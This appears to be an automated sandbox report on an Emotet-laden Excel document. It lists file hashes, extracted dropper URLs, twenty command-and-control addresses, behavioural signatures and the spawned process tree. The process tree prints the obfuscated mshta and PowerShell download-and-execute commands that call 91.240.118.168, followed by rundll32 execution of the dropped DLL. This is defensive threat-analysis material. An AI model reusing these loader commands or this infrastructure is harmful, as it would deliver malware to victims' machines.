Analysis

  • max time kernel
    55s
  • max time network
    61s
  • platform
    windows10_x64
  • resource
    win10-en-20211208
  • submitted
    28-01-2022 02:37

General

  • Target

    2022-1-28-ad7f6746586cdff93486e5f63c1912f7.xls

  • Size

    47KB

  • MD5

    ad7f6746586cdff93486e5f63c1912f7

  • SHA1

    f1bb883168498f4abdae014221fd632d8a9605a0

  • SHA256

    64b46ace0fd6708a2c0969a47fb2b1e7d6b360eef08f8afab735abbe5c3cc948

  • SHA512

    5901ac7e7e7b0f5bd9da1ac9cf93ac2f377109d9ff4828f8b3585c92949468b3d80325497440d6568fefdf871dd854490e7472f342f7a3e8e34acbcf3b320fe0

Malware Config

Extracted

Language
hta
Source
URLs
hta.dropper

http://91.240.118.168/vvv/ppp/fe.html

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://91.240.118.168/vvv/ppp/fe.png

Extracted

Family

emotet

Botnet

Epoch4

C2

51.15.4.22:443

173.214.173.220:8080

212.237.5.209:443

192.254.71.210:443

216.158.226.206:443

162.243.175.63:443

212.24.98.99:8080

58.227.42.236:80

45.118.115.99:8080

104.251.214.46:8080

185.157.82.209:8080

46.55.222.11:443

188.40.137.206:8080

81.0.236.90:443

103.75.201.2:443

129.232.188.93:443

195.154.133.20:443

159.8.59.82:8080

79.172.212.216:8080

138.185.72.26:8080

eck1.plain
ecs1.plain

Signatures

  • Emotet

    Emotet is a trojan that is primarily spread through spam emails.

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 3 IoCs
  • Downloads MZ/PE file
  • Loads dropped DLL 2 IoCs
  • Drops file in System32 directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 1 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 17 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 12 IoCs
  • Suspicious use of WriteProcessMemory 14 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\2022-1-28-ad7f6746586cdff93486e5f63c1912f7.xls"
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2132
    • C:\Windows\SYSTEM32\CMD.EXE
      CMD.EXE /c ms^hta http://91.2^40.118.1^68/vvv/ppp/f^e.ht^m^l
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:884
      • C:\Windows\system32\mshta.exe
        mshta http://91.240.118.168/vvv/ppp/fe.html
        3⤵
        • Blocklisted process makes network request
        • Suspicious use of WriteProcessMemory
        PID:4072
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.168/vvv/ppp/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
          4⤵
          • Blocklisted process makes network request
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1400
          • C:\Windows\system32\cmd.exe
            "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\ProgramData\QWER.dll,BBDD
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:440
            • C:\Windows\SysWow64\rundll32.exe
              C:\Windows\SysWow64\rundll32.exe C:\ProgramData\QWER.dll,BBDD
              6⤵
              • Loads dropped DLL
              • Suspicious use of WriteProcessMemory
              PID:3124
              • C:\Windows\SysWOW64\rundll32.exe
                C:\Windows\SysWOW64\rundll32.exe "C:\ProgramData\QWER.dll",DllRegisterServer
                7⤵
                • Loads dropped DLL
                • Drops file in System32 directory
                PID:632
        • C:\Windows\system32\WerFault.exe
          C:\Windows\system32\WerFault.exe -u -p 4072 -s 1892
          4⤵
          • Program crash
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3392

Network

MITRE ATT&CK Matrix ATT&CK v6

Discovery

System Information Discovery

3
T1082

Query Registry

2
T1012

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\ProgramData\QWER.dll
    MD5

    91889bc1858d4b5983c747be7e47fae7

    SHA1

    89bd70beecf51a83f0e9632e361847fddc9cf7aa

    SHA256

    23505b3556126c255502fe868283b2e93a0f5e051400c55d80c87a1e760c3be9

    SHA512

    8dacda8b1cc46454c394ed4275166db3aad8c45b9fcc4a8a4719e3613cce2ace2d3c9c59c5ede2e50e80b49ab989960e6fe3509db6d2874d017d931452d027fd

  • \ProgramData\QWER.dll
    MD5

    91889bc1858d4b5983c747be7e47fae7

    SHA1

    89bd70beecf51a83f0e9632e361847fddc9cf7aa

    SHA256

    23505b3556126c255502fe868283b2e93a0f5e051400c55d80c87a1e760c3be9

    SHA512

    8dacda8b1cc46454c394ed4275166db3aad8c45b9fcc4a8a4719e3613cce2ace2d3c9c59c5ede2e50e80b49ab989960e6fe3509db6d2874d017d931452d027fd

  • \ProgramData\QWER.dll
    MD5

    91889bc1858d4b5983c747be7e47fae7

    SHA1

    89bd70beecf51a83f0e9632e361847fddc9cf7aa

    SHA256

    23505b3556126c255502fe868283b2e93a0f5e051400c55d80c87a1e760c3be9

    SHA512

    8dacda8b1cc46454c394ed4275166db3aad8c45b9fcc4a8a4719e3613cce2ace2d3c9c59c5ede2e50e80b49ab989960e6fe3509db6d2874d017d931452d027fd

  • memory/632-591-0x0000000003FB0000-0x0000000003FD5000-memory.dmp
    Filesize

    148KB

  • memory/632-596-0x00000000046D0000-0x00000000046F5000-memory.dmp
    Filesize

    148KB

  • memory/632-594-0x0000000004500000-0x0000000004525000-memory.dmp
    Filesize

    148KB

  • memory/632-598-0x0000000004830000-0x0000000004855000-memory.dmp
    Filesize

    148KB

  • memory/632-600-0x0000000004890000-0x00000000048B5000-memory.dmp
    Filesize

    148KB

  • memory/632-602-0x00000000048F0000-0x0000000004915000-memory.dmp
    Filesize

    148KB

  • memory/1400-274-0x0000027EACC40000-0x0000027EACC62000-memory.dmp
    Filesize

    136KB

  • memory/1400-309-0x0000027EC4DF0000-0x0000027EC4E2C000-memory.dmp
    Filesize

    240KB

  • memory/1400-336-0x0000027EC54A0000-0x0000027EC5516000-memory.dmp
    Filesize

    472KB

  • memory/1400-376-0x0000027EACCF0000-0x0000027EC4E90000-memory.dmp
    Filesize

    385.6MB

  • memory/1400-448-0x0000027EACCF0000-0x0000027EC4E90000-memory.dmp
    Filesize

    385.6MB

  • memory/1400-515-0x0000027EACCF0000-0x0000027EC4E90000-memory.dmp
    Filesize

    385.6MB

  • memory/2132-128-0x00007FF906CA0000-0x00007FF906CB0000-memory.dmp
    Filesize

    64KB

  • memory/2132-129-0x00007FF906CA0000-0x00007FF906CB0000-memory.dmp
    Filesize

    64KB

  • memory/2132-115-0x00007FF909EF0000-0x00007FF909F00000-memory.dmp
    Filesize

    64KB

  • memory/2132-121-0x00007FF909EF0000-0x00007FF909F00000-memory.dmp
    Filesize

    64KB

  • memory/2132-118-0x00007FF909EF0000-0x00007FF909F00000-memory.dmp
    Filesize

    64KB

  • memory/2132-117-0x00007FF909EF0000-0x00007FF909F00000-memory.dmp
    Filesize

    64KB

  • memory/2132-116-0x00007FF909EF0000-0x00007FF909F00000-memory.dmp
    Filesize

    64KB

  • memory/3124-586-0x00000000043F0000-0x0000000004415000-memory.dmp
    Filesize

    148KB